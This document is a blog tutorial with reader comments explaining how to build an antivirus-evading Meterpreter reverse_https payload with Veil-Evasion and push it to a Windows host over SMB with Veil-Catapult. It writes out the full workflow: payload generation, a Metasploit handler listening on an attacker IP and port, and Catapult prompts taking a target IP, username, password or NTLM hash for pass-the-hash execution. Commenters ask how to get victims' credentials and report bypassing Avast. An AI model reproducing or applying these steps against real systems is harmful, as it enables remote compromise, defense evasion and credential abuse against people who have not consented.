Last time i written an article about delivering payload using PSExec but the Metasploit’s psexec and its stock .exe templates are getting failed and caught by AV is a common problem for penetration testers.
The Big question arises? how to upload and execute specified payloads, For that here come with an excellent tool SMBexec can accomplish the same goal by utilizing a patched version of samba to upload .exe’s and trigger them.
We already know about Veil-Framework, They recently added a payload delivery tool Veil-Catapult. Working as like SMBexec with utilizing Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution using temporary SMB server.
This will load the payload executable into memory without touching disk, allowing otherwise disk-detectable executable to bypass detection.
Its EXE delivery features seamless integration with Veil-Evasion is awesome,and we can specify our custom executable, otherwise can drop right into the Veil-Evasion generation menu and build a payload on the fly. Since this directly invokes the existing payload codebase, we have access to all the latest methods and modules as they’re released. After specifying our options and built an executable, we can dropped right back into the Veil-Catapult menu for target information. Single IPs or target lists can be used is another specail.
So we now going to create our custom executable using veil-evasion and delivering it to the target machine with help of veil-catapult by not getting caught in the eye of AV.
First we need to create undetectable executable using veil-evasion, For installing Veil-Evasion tool follow by previous post Evading-Antivirus.
After Veil-Evasion is installed, just run the script inside the Veil-Evasion directory.
#./Veil-Evasion.py
After executing Veil-Evasion.py python script. The Veil window will appear. You see that today it has 31 payloads:
You can obtain a list of all the payloads with the “list” command:
[>] Please enter a command: list
[>] Please enter a command: use 10
I am going to use the cs/meterpreter/reverse_https payload, so I type “use 10” and press Enter. It loads that component, as shown below:
This HTTPS stager will cause the entire communication path to be encrypted through SSL.
Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”
Enter value for ‘LPORT’: “80”
Next, I issue the “generate” command and press enter to create the executable and we need to press enter and then Veil requests us the name of our payload.
We need to set our metaspoit to listen for meterperter reverse tcp connection in port 80
#msfconsole
#msf > use exploit/multi/handler
#msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
#msf exploit(handler) > set LHOST 192.168.31.20
#msf exploit(handler) > set LPORT 80
#msf exploit(handler) > exploit -j
#msf exploit(handler) > jobs
It will the show our current job of reverse_https handler, now we going to use the Veil-Catapult to delivery our executable using SMB Shares on the target.
For installing Veil-Catapult follow by previous post, after Veil-Evasion is installed, just run the script inside the Veil-Catapult directory.
#./Veil-Catapult.py
Veil-Catapult extends the capabilities of the existing Veil framework by utilizing various methods to deliver and trigger payloads across targeted machines. It had a following standlone payload creating techniques.
Powershell Injector
Barebones Python Injector
Sethc Backdoor
But we already created our executable, so move to EXE delivering part.
[>] Enter EXE path, or [enter] to use Veil-Evasion: /root/veil-output/compiled/install.exe
[>] Enter a target IP or target list: 192.168.31.2
[>] Enter a [domain/]username or credump file: sathish
[>] Enter a password or LM:NTLM hash: bhuvi
[>] Use pth-[wmis] (default) or pth-[winexe]? winexe
[>] Would you like to [h]ost the .exe or [u]pload it (default)?
[>] Warning: python payloads MUST be uploaded! : u
[>] Press enter to launch:
Above i enter the path of my executable created by veil-evasion and target ip with the SMB credentials.
Triggering utilizes the passing-the-hash toolkit, specifically pth-wmis and pth-winexe. pth-wmis doesn’t create a service, but pth-winexe will run as system, so which to choose is situation dependent. Payloads can also be uploaded and triggered on a victim, or hosted on a temporary Impacket SMB server on the target and triggered with \\UNC paths.
This will load the payload executable into memory without touching disk, allowing otherwise disk-detectable executables to bypass detection.
Whenever an exe is uploaded/host and then triggered on a host, cleanup instructions are written out to a resource file. Calling ./Veil-Catapult.py -r CLEANUP_FILE will first kill all associated processes on popped hosts.
Finally executed and get a meterpreter session and AV Still searching …
Great site, but I’ve got 2 questions
[>] Enter a [domain/]username or credump file: sathish
[>] Enter a password or LM:NTLM hash: bhuvi
I’m not sure where we’re supposed to be getting these 2 pieces of information from. Are we supposed to get them though recon or is their an easier way to get them remotely?
It’s all about how you enumerated the system and finding weak points, improper configuration. it may help you to get those things.
Yes even I have the same question. So are “sathish” and “bhuvi” username and password of the victim’s computer? How can we manage to get our hands on that? And how are we going to find the weak points and improper configuration?
P.S. I’m new to this. Cheers!
It says that it can also use a password hash. I have recovered a password hash for the main user on my test system using responder, but the password is too complex for john to crack. So can I just use the hash here instead of the password and do I just paste it in or do I have to specify the file name/ect?
Also, When I start my Veil-Catapult, it gives me this warning:
[!] Warning: install Veil-Evasion for full functionality
But I’ve already installed it following your instructions and even that is open in another terminal.
And when I launch the Veil-Catapult with the username and password of my windows system on which I’m testing, I get this exception message:
Exception: global name ‘helpers’ is not defined
[!] Error on 192.168.0.6 with credentials :
==>192.168.0.6 is my local IP.
Cheers. Peace.
hi,
how Can I execute remotely.
I’ve a shared folder with everyone permission to read and execute.
thanks
Thanks for such an informative session. The payload has been successfully upoaded and triggered and as it passed the AV test. I have Avast AV installed by the way. But i am getting stuck at this stage
[*] Sending stage (770048 bytes) to 192.168.0.104
What could be the issue?